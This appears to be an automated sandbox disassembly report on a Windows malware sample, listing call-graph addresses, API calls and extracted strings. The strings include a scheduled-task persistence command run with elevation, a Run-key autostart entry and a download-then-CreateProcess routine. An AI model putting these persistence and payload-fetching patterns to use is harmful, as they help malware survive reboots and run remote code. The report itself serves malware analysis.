4017c8 11140->11145 11141->11132 11142->11156 11144->11145 11264 401a80 11145->11264 11146 4014d5 ExpandEnvironmentStringsW SHCreateDirectoryExW 11148 401503 SetFileAttributesW 11146->11148 11146->11156 11148->11156 11149 4017d7 CallUnexpected 11150 4017e7 CreateProcessW 11149->11150 11150->11141 11151 401825 CloseHandle CloseHandle 11150->11151 11151->11141 11153 4015ad GetProcessHeap HeapAlloc 11153->11156 11154 406120 27 API calls 11154->11153 11155 401600 GetProcessHeap HeapFree 11155->11156 11156->11134 11156->11139 11156->11148 11156->11153 11156->11154 11156->11155 11186 4025b0 InternetOpenW 11156->11186 11199 406dd0 11156->11199 11212 4069e0 11156->11212 11278 406120 11156->11278 11159 402508 11158->11159 11160 4024dd GetTokenInformation CloseHandle 11158->11160 11161 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11159->11161 11160->11159 11162 402515 11161->11162 11162->10748 11162->10754 11164 4025b0 18 API calls 11163->11164 11165 401888 11164->11165 11166 401a63 11165->11166 11167 401893 GetProcessHeap HeapAlloc SHGetSpecialFolderPathW 11165->11167 11169 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11166->11169 11167->11166 11168 4018c4 11167->11168 11171 406dd0 29 API calls 11168->11171 11170 401a70 11169->11170 11170->10747 11172 4018d8 11171->11172 11173 4018fb CallUnexpected 11172->11173 11174 406120 27 API calls 11172->11174 11173->11166 11175 40197d GetProcessHeap HeapAlloc 11173->11175 11176 406120 27 API calls 11173->11176 11177 4069e0 71 API calls 11173->11177 11178 4019e6 CreateProcessW 11173->11178 11174->11173 11175->11173 11176->11175 11177->11173 11179 401a24 CloseHandle CloseHandle 11178->11179 11180 401a3c GetProcessHeap HeapFree 11178->11180 11179->11180 11180->11173 11182 402576 ShellExecuteW 11181->11182 11182->11182 11183 40258e GetProcessHeap HeapFree GetProcessHeap HeapFree ExitProcess 11182->11183 11185 409c88 11184->11185 11185->11125 11185->11185 11187 4025f5 InternetOpenUrlW 11186->11187 11188 
4026f9 11186->11188 11190 4026ed InternetCloseHandle 11187->11190 11195 40260f __InternalCxxFrameHandler 11187->11195 11189 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11188->11189 11191 402707 11189->11191 11190->11188 11191->11156 11192 402630 InternetReadFile 11193 402665 GetProcessHeap RtlReAllocateHeap 11192->11193 11194 402658 GetProcessHeap HeapAlloc 11192->11194 11193->11195 11194->11195 11195->11192 11196 4026a7 GetProcessHeap RtlAllocateHeap 11195->11196 11197 409c70 __InternalCxxFrameHandler 11196->11197 11198 4026cc GetProcessHeap RtlFreeHeap InternetCloseHandle 11197->11198 11198->11190 11329 407172 11199->11329 11201 406e07 CallUnexpected 11202 406e1c GetCurrentDirectoryW 11201->11202 11203 406e66 11202->11203 11203->11203 11204 406e89 11203->11204 11205 407172 16 API calls 11204->11205 11206 406e9b 11205->11206 11339 405360 11206->11339 11208 406ec5 11209 407172 16 API calls 11208->11209 11210 406ecb 11208->11210 11211 406f42 11209->11211 11210->11146 11211->11146 11213 406a44 11212->11213 11222 406a01 11212->11222 11214 406a65 11213->11214 11215 406a7d 11213->11215 11217 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11214->11217 11216 406ab8 11215->11216 11218 406a86 11215->11218 11219 406b13 11216->11219 11227 406aa8 11216->11227 11220 406a77 11217->11220 11225 405540 8 API calls 11218->11225 11223 406120 27 API calls 11219->11223 11220->11155 11221 406a20 11228 40c52b ___std_exception_copy 14 API calls 11221->11228 11222->11213 11222->11221 11224 40c52b ___std_exception_copy 14 API calls 11222->11224 11226 406b22 11223->11226 11224->11221 11225->11227 11229 406b32 11226->11229 11230 406b6e 11226->11230 11227->11216 11231 405540 8 API calls 11227->11231 11228->11213 11232 406830 66 API calls 11229->11232 11233 406bb7 11230->11233 11235 406dc4 11230->11235 11236 406bd4 11230->11236 11231->11227 11234 406b59 11232->11234 11601 4027b0 11233->11601 11237 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 
11234->11237 11605 407097 11235->11605 11236->11233 11238 406c25 11236->11238 11239 406b68 11237->11239 11242 4027b0 45 API calls 11238->11242 11239->11155 11243 406c20 11242->11243 11485 406830 11243->11485 11246 406c50 CreateFileW 11247 406c93 11246->11247 11248 406c7b 11246->11248 11552 405b70 11247->11552 11249 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11248->11249 11251 406c8d 11249->11251 11251->11155 11253 406ca0 11254 406ce9 WriteFile 11253->11254 11258 406d15 11253->11258 11570 405d40 11253->11570 11254->11253 11254->11258 11255 406d65 11256 406da1 CloseHandle 11255->11256 11257 406d73 SetFileTime CloseHandle 11255->11257 11259 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11256->11259 11257->11256 11258->11255 11260 406d41 11258->11260 11262 40c52b ___std_exception_copy 14 API calls 11258->11262 11261 406dbe 11259->11261 11263 40c52b ___std_exception_copy 14 API calls 11260->11263 11261->11155 11262->11260 11263->11255 11265 401e66 GetProcessHeap HeapAlloc GetSystemDirectoryW 11264->11265 11266 401aa6 RegOpenKeyW lstrlenW RegSetValueExW RegCloseKey 11264->11266 11267 402485 GetProcessHeap HeapFree 11265->11267 11268 401e9c GetProcessHeap HeapAlloc 11265->11268 11274 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11266->11274 11269 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11267->11269 11271 402020 wsprintfW GetProcessHeap HeapAlloc 11268->11271 11273 40249f 11269->11273 11275 402420 6 API calls 11271->11275 11273->11149 11276 401e62 11274->11276 11275->11267 11276->11149 11279 406813 11278->11279 11280 40614d 11278->11280 11282 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11279->11282 11280->11279 11281 406158 11280->11281 11283 406165 11281->11283 11285 4060b0 14 API calls 11281->11285 11284 406825 11282->11284 11286 406177 11283->11286 11287 40619d 11283->11287 11284->11156 11285->11283 11288 4061a2 11286->11288 11290 40617c 11286->11290 11287->11288 11289 4061f8 
11287->11289 11292 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11288->11292 11295 406203 11289->11295 11300 406235 11289->11300 11291 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11290->11291 11293 406197 11291->11293 11294 4061f2 11292->11294 11293->11156 11294->11156 11298 405540 8 API calls 11295->11298 11296 406293 11297 405540 8 API calls 11296->11297 11299 4062b1 11297->11299 11302 406225 11298->11302 11301 405910 7 API calls 11299->11301 11300->11296 11300->11302 11303 4062cf 11301->11303 11302->11300 11304 405540 8 API calls 11302->11304 11305 4062d6 11303->11305 11306 4062ee 11303->11306 11304->11302 11307 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11305->11307 11309 4062fd SetFilePointer 11306->11309 11311 406316 11306->11311 11315 406356 11306->11315 11308 4062e8 11307->11308 11308->11156 11309->11311 11310 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11312 406371 11310->11312 11313 404f30 6 API calls 11311->11313 11312->11156 11314 40634b 11313->11314 11314->11315 11316 406377 MultiByteToWideChar 11314->11316 11315->11310 11317 4063a6 11316->11317 11318 406535 SystemTimeToFileTime LocalFileTimeToFileTime 11317->11318 11320 40663e 11318->11320 11319 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11321 40680d 11319->11321 11320->11319 11321->11156 11323 406f68 11322->11323 11324 406f69 IsProcessorFeaturePresent 11322->11324 11323->11135 11326 406fb2 11324->11326 11944 406f73 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11326->11944 11328 407095 11328->11135 11332 407177 11329->11332 11331 407191 11331->11201 11332->11331 11333 40c57b _unexpected 2 API calls 11332->11333 11335 407193 11332->11335 11369 40c546 11332->11369 11333->11332 11334 4074f5 11336 408720 CallUnexpected RaiseException 11334->11336 11335->11334 11376 408720 11335->11376 11338 407512 11336->11338 11338->11201 11340 405376 CallUnexpected 11339->11340 11345 
40551d 11339->11345 11379 405180 11340->11379 11342 405393 11343 40550e 11342->11343 11346 4053c2 11342->11346 11347 4053ad SetFilePointer 11342->11347 11344 405514 CloseHandle 11343->11344 11343->11345 11344->11345 11345->11208 11394 4050e0 11346->11394 11347->11346 11352 405080 6 API calls 11353 4053f9 11352->11353 11353->11343 11354 405080 6 API calls 11353->11354 11355 40540e 11354->11355 11355->11343 11356 405080 6 API calls 11355->11356 11357 405423 11356->11357 11357->11343 11358 4050e0 6 API calls 11357->11358 11359 405458 11358->11359 11359->11343 11360 4050e0 6 API calls 11359->11360 11361 40546a 11360->11361 11361->11343 11362 405080 6 API calls 11361->11362 11363 40547f 11362->11363 11363->11343 11364 405499 11363->11364 11365 40c546 ___std_exception_copy 15 API calls 11364->11365 11366 4054c7 11365->11366 11408 405540 11366->11408 11368 4054fa 11368->11208 11375 40dc7f _unexpected 11369->11375 11370 40dcbd 11371 40dc32 ___std_exception_copy 14 API calls 11370->11371 11373 40dcbb 11371->11373 11372 40dca8 RtlAllocateHeap 11372->11373 11372->11375 11373->11332 11374 40c57b _unexpected 2 API calls 11374->11375 11375->11370 11375->11372 11375->11374 11377 408767 RaiseException 11376->11377 11378 40873a 11376->11378 11377->11334 11378->11377 11383 4051a6 11379->11383 11380 405212 11381 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11380->11381 11382 405222 11381->11382 11382->11342 11383->11380 11384 40c546 ___std_exception_copy 15 API calls 11383->11384 11385 405206 11384->11385 11385->11380 11393 405226 __InternalCxxFrameHandler 11385->11393 11386 405339 11465 40c52b 11386->11465 11389 40527a SetFilePointer 11389->11393 11390 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11392 405352 11390->11392 11391 40529f ReadFile 11391->11393 11392->11342 11393->11386 11393->11389 11393->11391 11468 404fd0 11394->11468 11396 4050f9 11397 404fd0 6 API calls 11396->11397 11399 40510f 11396->11399 11397->11399 11398 40512a 11401 405143 
11398->11401 11402 404fd0 6 API calls 11398->11402 11399->11398 11400 404fd0 6 API calls 11399->11400 11400->11398 11401->11343 11403 405080 11401->11403 11402->11401 11404 404fd0 6 API calls 11403->11404 11405 405095 11404->11405 11406 4050ab 11405->11406 11407 404fd0 6 API calls 11405->11407 11406->11343 11406->11352 11407->11406 11409 405554 11408->11409 11410 40555e 11408->11410 11409->11368 11411 405586 11410->11411 11412 405571 SetFilePointer 11410->11412 11413 405593 11410->11413 11414 4050e0 6 API calls 11411->11414 11412->11411 11415 404fd0 6 API calls 11413->11415 11414->11413 11416 4055b7 11415->11416 11417 4055cb 11416->11417 11418 404fd0 6 API calls 11416->11418 11419 404fd0 6 API calls 11417->11419 11418->11417 11420 4055f3 11419->11420 11421 405607 11420->11421 11422 404fd0 6 API calls 11420->11422 11423 404fd0 6 API calls 11421->11423 11422->11421 11424 40562f 11423->11424 11425 405643 11424->11425 11426 404fd0 6 API calls 11424->11426 11427 404fd0 6 API calls 11425->11427 11426->11425 11428 40566b 11427->11428 11429 40567f 11428->11429 11430 404fd0 6 API calls 11428->11430 11431 4050e0 6 API calls 11429->11431 11430->11429 11432 4056a5 11431->11432 11433 4050e0 6 API calls 11432->11433 11434 4056fd 11433->11434 11435 4050e0 6 API calls 11434->11435 11436 40570c 11435->11436 11437 4050e0 6 API calls 11436->11437 11438 40571b 11437->11438 11439 404fd0 6 API calls 11438->11439 11440 40572c 11439->11440 11441 404fd0 6 API calls 11440->11441 11442 405740 11440->11442 11441->11442 11443 404fd0 6 API calls 11442->11443 11444 405768 11443->11444 11445 40577c 11444->11445 11446 404fd0 6 API calls 11444->11446 11447 404fd0 6 API calls 11445->11447 11446->11445 11448 4057a4 11447->11448 11449 4057b8 11448->11449 11450 404fd0 6 API calls 11448->11450 11451 404fd0 6 API calls 11449->11451 11450->11449 11452 4057e0 11451->11452 11453 4057f4 11452->11453 11454 404fd0 6 API calls 11452->11454 11455 404fd0 6 API calls 11453->11455 11454->11453 11456 40581c 
11455->11456 11457 405830 11456->11457 11458 404fd0 6 API calls 11456->11458 11459 4050e0 6 API calls 11457->11459 11458->11457 11460 405856 11459->11460 11461 4050e0 6 API calls 11460->11461 11463 40586a 11461->11463 11462 40586e 11462->11368 11463->11462 11477 404f30 11463->11477 11466 40dc45 __freea 14 API calls 11465->11466 11467 40533f 11466->11467 11467->11390 11469 404ff4 ReadFile 11468->11469 11471 40500c __InternalCxxFrameHandler 11468->11471 11469->11471 11470 405047 11472 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11470->11472 11471->11470 11473 40506b 11471->11473 11474 40505c 11472->11474 11475 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11473->11475 11474->11396 11476 40507b 11475->11476 11476->11396 11478 404f5b ReadFile 11477->11478 11480 404f8c __InternalCxxFrameHandler 11477->11480 11479 404f70 11478->11479 11481 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11479->11481 11482 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11480->11482 11483 404f88 11481->11483 11484 404fc6 11482->11484 11483->11462 11484->11462 11490 4068d1 __InternalCxxFrameHandler 11485->11490 11491 406851 11485->11491 11486 4069c1 11487 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11486->11487 11488 4069cd 11487->11488 11488->11246 11489 4068b0 GetFileAttributesW 11489->11490 11492 4068c2 CreateDirectoryW 11489->11492 11490->11486 11493 4069d1 11490->11493 11496 40693d 11490->11496 11497 406926 11490->11497 11491->11489 11491->11493 11494 4068a6 11491->11494 11492->11490 11495 407097 5 API calls 11493->11495 11494->11489 11504 4069d6 11495->11504 11499 406997 GetFileAttributesW 11496->11499 11498 406830 57 API calls 11497->11498 11498->11496 11499->11486 11501 4069b2 CreateDirectoryW 11499->11501 11500 406a44 11502 406a65 11500->11502 11503 406a7d 11500->11503 11501->11486 11505 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11502->11505 11506 406a86 11503->11506 11515 406ab8 
11503->11515 11504->11500 11509 406a20 11504->11509 11511 40c52b ___std_exception_copy 14 API calls 11504->11511 11508 406a77 11505->11508 11512 405540 8 API calls 11506->11512 11507 406b13 11510 406120 27 API calls 11507->11510 11508->11246 11514 40c52b ___std_exception_copy 14 API calls 11509->11514 11513 406b22 11510->11513 11511->11509 11516 406aa8 11512->11516 11518 406b32 11513->11518 11520 406b6e 11513->11520 11514->11500 11515->11507 11515->11516 11516->11515 11517 405540 8 API calls 11516->11517 11517->11516 11519 406830 57 API calls 11518->11519 11522 406b59 11519->11522 11521 406bb7 11520->11521 11523 406dc4 11520->11523 11524 406bd4 11520->11524 11528 4027b0 45 API calls 11521->11528 11525 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11522->11525 11529 407097 5 API calls 11523->11529 11524->11521 11526 406c25 11524->11526 11527 406b68 11525->11527 11530 4027b0 45 API calls 11526->11530 11527->11246 11531 406c20 11528->11531 11532 406dc9 11529->11532 11530->11531 11533 406830 57 API calls 11531->11533 11534 406c50 CreateFileW 11533->11534 11535 406c93 11534->11535 11536 406c7b 11534->11536 11538 405b70 22 API calls 11535->11538 11537 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11536->11537 11539 406c8d 11537->11539 11541 406ca0 11538->11541 11539->11246 11540 405d40 7 API calls 11540->11541 11541->11540 11542 406ce9 WriteFile 11541->11542 11546 406d15 11541->11546 11542->11541 11542->11546 11543 406d65 11544 406da1 CloseHandle 11543->11544 11545 406d73 SetFileTime CloseHandle 11543->11545 11547 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11544->11547 11545->11544 11546->11543 11548 406d41 11546->11548 11550 40c52b ___std_exception_copy 14 API calls 11546->11550 11549 406dbe 11547->11549 11551 40c52b ___std_exception_copy 14 API calls 11548->11551 11549->11246 11550->11548 11551->11543 11553 405b84 11552->11553 11554 405d2a 11552->11554 11553->11554 11555 405b99 11553->11555 11644 4060b0 11553->11644 

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00401E2D
                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 00401E34
                                                                                                            • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000), ref: 00401E46
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401E4F
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000020A,7591F380,00000000,00000000), ref: 00401E73
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401E76
                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00401E88
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00401EA3
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401EA6
                                                                                                            • wsprintfW.USER32 ref: 0040204E
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 0040205E
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00402061
                                                                                                            • wsprintfW.USER32 ref: 00402449
                                                                                                            • ShellExecuteW.SHELL32(00000000,runas,?,?,00000000,00000000), ref: 0040246A
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00402478
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040247B
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00402480
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402483
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0040248D
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402490
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocFree$wsprintf$CloseDirectoryExecuteOpenShellSystemValuelstrlen
                                                                                                            • String ID: "$#$#$$$$$%$%s\schtasks.exe$/c "%s"$/create /sc ONLOGON /tn "%s" /tr "%s" /RL HIGHEST$;$>$?$?$C$I$L$L$L$L$L$L$N$N$b$b$cmd.exe$i$invalid distance code$invalid literal/length code$l$need dictionary$p$runas$y$z
                                                                                                            • API String ID: 2564131513-3794329617
                                                                                                            • Opcode ID: 04f389ca7741c3945aa586c21f7cf16ee9636da73d18371d90bdc4e067ade90d
                                                                                                            • Instruction ID: c7f21fddc8ea59a5295c2fb286fd8e4a5c2df640abba276a52794d12d8862d0e
                                                                                                            • Opcode Fuzzy Hash: 04f389ca7741c3945aa586c21f7cf16ee9636da73d18371d90bdc4e067ade90d
                                                                                                            • Instruction Fuzzy Hash: DB42E168810369D9C720AFA2E8047FAB7F0FF2D745F419066E988EB560F3784985DB1D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00401460
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401463
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 004014AD
                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000104), ref: 004014E3
                                                                                                            • SHCreateDirectoryExW.SHELL32(00000000,00000000,00000000), ref: 004014EE
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000002), ref: 00401506
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000020A,00000000,00000000,000000FF,?), ref: 004015B9
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004015BC
                                                                                                            • PathCombineW.SHLWAPI(00000000,?,?), ref: 004015D6
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040160E
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401611
                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 00401760
                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 00401767
                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 00401786
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040178D
                                                                                                            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 004017B0
                                                                                                            • CloseHandle.KERNEL32(?), ref: 004017C2
                                                                                                              • Part of subcall function 004025B0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 004025E1
                                                                                                              • Part of subcall function 004025B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004025FB
                                                                                                              • Part of subcall function 004025B0: InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00402644
                                                                                                              • Part of subcall function 004025B0: GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 0040265A
                                                                                                              • Part of subcall function 004025B0: HeapAlloc.KERNEL32(00000000), ref: 0040265D
                                                                                                              • Part of subcall function 004025B0: GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 004026AA
                                                                                                              • Part of subcall function 004025B0: RtlAllocateHeap.NTDLL(00000000), ref: 004026AD
                                                                                                              • Part of subcall function 004025B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004026D7
                                                                                                              • Part of subcall function 004025B0: RtlFreeHeap.NTDLL(00000000), ref: 004026DA
                                                                                                              • Part of subcall function 004025B0: InternetCloseHandle.WININET(?), ref: 004026E6
                                                                                                              • Part of subcall function 004025B0: InternetCloseHandle.WININET(?), ref: 004026F3
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?), ref: 0040181B
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00401831
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00401839
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040183E
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401841
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$CloseHandleInternet$AllocFileFreeOpen$CreatePathToken$AllocateAttributesCombineCurrentDirectoryEnvironmentExistsExpandInformationReadSleepStringslstrcat
                                                                                                            • String ID: D$K$Pst^t$Software\Microsoft\Windows\CurrentVersion\Run$V$x
                                                                                                            • API String ID: 4228357295-1170846629
                                                                                                            • Opcode ID: 09e7c342ff7ef1e8aa6c8c2914d6a13d771e8eda33ff2520deb63734306e375f
                                                                                                            • Instruction ID: 941f8200bb5dc01e3074ee4e512f6a8a68adff5b2a31c42b6da5280b9b9f5b68
                                                                                                            • Opcode Fuzzy Hash: 09e7c342ff7ef1e8aa6c8c2914d6a13d771e8eda33ff2520deb63734306e375f
                                                                                                            • Instruction Fuzzy Hash: C6C15274901219ABDB60AFA1DC487EE77B4FF08704F50806AF545FB2A0EB789D41CB59

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • lstrcmpA.KERNEL32(00000000,?), ref: 004010A2
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 004010C7
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004010CE
                                                                                                            • lstrlenA.KERNEL32(M1Zw0w66GQYFi), ref: 004010EC
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 0040123C
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401243
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000002), ref: 00401285
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040128C
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000047), ref: 004012E7
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004012EE
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000047), ref: 00401333
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040133A
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000047), ref: 0040137F
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401386
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000049), ref: 004013E5
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004013EC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocProcess$lstrcmplstrlen
                                                                                                            • String ID: M1Zw0w66GQYFi
                                                                                                            • API String ID: 522894340-229323296
                                                                                                            • Opcode ID: ced7a56b3a61907fb8fe41de2cd97cbfb0ca110354a1c6c8f3752cb3cf85e2ed
                                                                                                            • Instruction ID: 7eaf7544914a4b63e10803f82ca2e1c8860f16828a002309d4904a98d064a725
                                                                                                            • Opcode Fuzzy Hash: ced7a56b3a61907fb8fe41de2cd97cbfb0ca110354a1c6c8f3752cb3cf85e2ed
                                                                                                            • Instruction Fuzzy Hash: 69D1E571C041659FDB14CFA9C8946FABBF4AF1D310F1881BAE895A7342D6389A05CBA4

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 004025E1
                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004025FB
                                                                                                            • InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00402644
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 0040265A
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040265D
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,0000000100000000), ref: 00402668
                                                                                                            • RtlReAllocateHeap.NTDLL(00000000), ref: 0040266B
                                                                                                            • GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 004026AA
                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 004026AD
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004026D7
                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 004026DA
                                                                                                            • InternetCloseHandle.WININET(?), ref: 004026E6
                                                                                                            • InternetCloseHandle.WININET(?), ref: 004026F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Internet$Process$AllocateCloseHandleOpen$AllocFileFreeRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1681177425-0
                                                                                                            • Opcode ID: 99fa4245f036d7ca7f0a99e565945882106ecdf69a0e089de33d57685f3b7670
                                                                                                            • Instruction ID: 279d8a5f81a2e8e77284af958758153dca1b73d3fdef49649256d379fc70e3f9
                                                                                                            • Opcode Fuzzy Hash: 99fa4245f036d7ca7f0a99e565945882106ecdf69a0e089de33d57685f3b7670
                                                                                                            • Instruction Fuzzy Hash: 41312F71900119ABDB609B65DC4DF9ABBBCFF85714F00C1A5F548A2290DE709E85CFA4

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,00000000,00000000,00000000), ref: 00406C6A
                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00406CFF
                                                                                                            • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00406D8F
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00406D96
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00406DA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseHandle$CreateTimeWrite
                                                                                                            • String ID: %s%s$%s%s%s$:
                                                                                                            • API String ID: 3400595745-3034790606
                                                                                                            • Opcode ID: 98c9b71b694020488306e050b8bcd48454193dd243e4d79f583766080529faf7
                                                                                                            • Instruction ID: 5c485409a167992925fbe071c51fea0c94dd585c77c72435f2c53fcfd623a355
                                                                                                            • Opcode Fuzzy Hash: 98c9b71b694020488306e050b8bcd48454193dd243e4d79f583766080529faf7
                                                                                                            • Instruction Fuzzy Hash: 89B1C2716006159BDB20EF24C885BABB3B4EF04314F01057FE95BB72C1D738A9A4CB98

                                                                                                            Control-flow Graph

